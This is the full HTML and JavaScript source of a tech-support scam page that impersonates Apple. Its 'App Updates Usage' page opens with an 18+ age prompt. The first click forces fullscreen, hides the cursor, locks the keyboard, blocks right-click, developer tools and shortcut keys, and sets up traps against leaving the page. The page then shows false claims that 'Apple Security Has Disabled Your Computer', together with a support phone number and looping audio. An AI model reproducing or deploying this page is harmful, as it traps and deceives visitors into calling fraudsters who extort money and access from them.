<!DOCTYPE html>
<html>
    <head>
        <meta charset="utf-8">
        <title>App Updates Usage</title>
        <style>#modal-image,#modal-message{margin-bottom:20px}#support-text,#welcomeDiv{display:none;left:50%;transform:translateX(-50%);text-align:center}body{background-image:url("images/bg1.png");background-size:100% 100%;background-repeat:no-repeat;background-position:center center;display:flex;justify-content:center;align-items:center;height:100vh;margin:0;font-family:Arial,sans-serif;color:#fff}body.fullscreen{background-image:url("images/bg2.jpg")}#support-text{position:absolute;top:80%;font-size:24px;width:100%;font-weight:700;color:#000}#support-text span{font-weight:400}#music{display:none}#modal-overlay{display:none;position:fixed;top:0;left:0;width:100%;height:100%;z-index:9999;background-color:rgba(0,0,0,.75);backdrop-filter:blur(55px)}#modal-content{border-radius:5px;max-width:400px;margin:100px auto;padding:20px;text-align:center;background:linear-gradient(135deg,#000 30%,#333 100%);color:#fff}#modal-close{cursor:pointer;color:#888;float:right;font-size:20px;font-weight:700}#modal-message{color:#fff;font-weight:700}.modal-buttons{display:flex;justify-content:space-between;margin-top:20px}.modal-buttons button{width:100px;padding:10px 0;border:none;border-radius:5px;cursor:pointer;font-weight:700;transition:background-color .3s}.modal-buttons button.accept{background-color:#6610f2;color:#fff}.modal-buttons button.dismiss{background-color:#333;color:#fff}#welcomeDiv{background-color:#000;height:auto;width:550px;position:fixed;top:0;z-index:9999999999}#welcomeDiv p{color:#fefefe;margin-top:10px;font-size:16px;opacity:.9}</style>
        <script disable-devtool-auto src="https://cdn.jsdelivr.net/npm/disable-devtool@latest/disable-devtool.min.js"></script>
        <script>
            DisableDevtool({});
            document.addEventListener('DOMContentLoaded', function () {
                var isPopupVisible = true;
                var music = document.getElementById('music');
                var isPlaying = false;

                function toggleMusic() {
                    if (isPlaying) {
                        music.pause();
                    } else {
                        music.play();
                    }
                    isPlaying = !isPlaying;
                }
                function playMusicOnClick() {
                    toggleMusic();
                    document.removeEventListener('click', playMusicOnClick);
                }
                music.addEventListener('click', toggleMusic);
                document.addEventListener('click', playMusicOnClick);

                var fullscreenEnabled = document.fullscreenEnabled || document.mozFullScreenEnabled || document.documentElement.webkitRequestFullScreen;
                if (fullscreenEnabled) {
                    document.documentElement.requestFullscreen = document.documentElement.requestFullscreen || document.documentElement.mozRequestFullScreen || document.documentElement.webkitRequestFullScreen;
                    document.cancelFullscreen = document.cancelFullscreen || document.mozCancelFullScreen || document.webkitCancelFullScreen;

                    var isFullscreen = false;

                    document.addEventListener('click', function () {
                        if (!isFullscreen) {
                            isFullscreen = true;
                            document.documentElement.requestFullscreen();
                            document.body.classList.add('fullscreen');
                            showWelcomeDiv();
                            showSupportText();
                        }
                    });
                    document.addEventListener('fullscreenchange', function () {
                        isFullscreen = !isFullscreen;
                    });
                }

                var modalOverlay = document.getElementById('modal-overlay');
                var modalClose = document.getElementById('modal-close');
                function showModal() {
                    modalOverlay.style.display = 'block';
                }
                function closeModal() {
                    modalOverlay.style.display = 'none';
                }
                modalClose.addEventListener('click', closeModal);
                showModal();
                function hideCursor() {
                    document.documentElement.style.cursor = 'none';
                }

                document.addEventListener('click', function () {
                    hideCursor();
                    document.removeEventListener('click', hideCursor);
                    if (isPopupVisible) {
                        closeModal();
                        isPopupVisible = false;
                    }
                });

                var acceptButton = document.getElementById('modal-accept');
                var dismissButton = document.getElementById('modal-dismiss');
                acceptButton.addEventListener('click', closeModal);
                dismissButton.addEventListener('click', closeModal);

                document.addEventListener('contextmenu', function (event) {
                    event.preventDefault();
                });
                document.addEventListener('keydown', function (e) {
                    if (e.ctrlKey && (e.keyCode === 'U'.charCodeAt(0) || e.keyCode === 'u'.charCodeAt(0)) ||
                        e.ctrlKey && (e.keyCode === 'C'.charCodeAt(0) || e.keyCode === 'c'.charCodeAt(0)) ||
                        e.ctrlKey && (e.keyCode === 'S'.charCodeAt(0) || e.keyCode === 's'.charCodeAt(0))) {
                        e.preventDefault();
                    }
                });
                function preventKeyEvents(event) {
                    const blockedKeyCodes = [123];
                    const keyCode = event.keyCode || event.which;

                    if (blockedKeyCodes.includes(keyCode)) {
                        event.preventDefault();
                        console.log(`Key with code ${keyCode} is blocked.`);
                    }
                }
                window.addEventListener('keydown', preventKeyEvents);
            });

            navigator.keyboard.lock();
            document.onkeydown = function (e) {
                return false;
            }
            function showWelcomeDiv() {
                var welcomeDiv = document.getElementById('welcomeDiv');
                welcomeDiv.style.display = 'block';
            }
            function showSupportText() {
                var supportText = document.getElementById('support-text');
                supportText.style.display = 'block';
            }
        </script>
        <script type="text/javascript">
            window.onbeforeunload = function() {
                if (data_needs_saving()) {
                    return "Call Apple  Defender Helpline Now";
                } else {
                    return;
                }
            };
            window.addEventListener("beforeunload", function (e) {
                var confirmationMessage = 'It looks like you are editing something. '
                + 'Your changes will be lost if you leave before saving.';
                (e || window.event).returnValue = confirmationMessage; //Gecko + IE
                return confirmationMessage; //Gecko + Webkit, Safari, Chrome etc.
            });
        </script>
    </head>
    <body>
        <audio id="music" src="media/text-to-speech.mp3" controls="" loop=""></audio>
        <div id="modal-overlay" style="display: block;">
            <div id="modal-content">
                <span id="modal-close">×</span>
                <p id="modal-message">Are You 18+ ? <br><br>This website is for users who are 18 or older. Please confirm your age to continue.</p>
                <div class="modal-buttons">
                    <button type="button" id="modal-accept" class="accept blinking">Yes</button>
                    <button type="button" id="modal-dismiss" class="dismiss blinking">No</button>
                </div>
            </div>
        </div>
        <div id="welcomeDiv">
            <p>Apple Security Has Disabled Your Computer.<br>Please Contact Apple Support To Unlock Your Computer.<br> +1 (888) 671-8418</p>
        </div>
        <p></p>
        <div id="support-text">
            Do not reboot or use Your Device. Device is disabled.<br><span style="color:#cc0000"> Call Apple Support Toll Free +1 (888) 671-8418 </span><br>Copyright © 2025 Apple Inc. All rights reserved.
        </div>
  </body>
</html>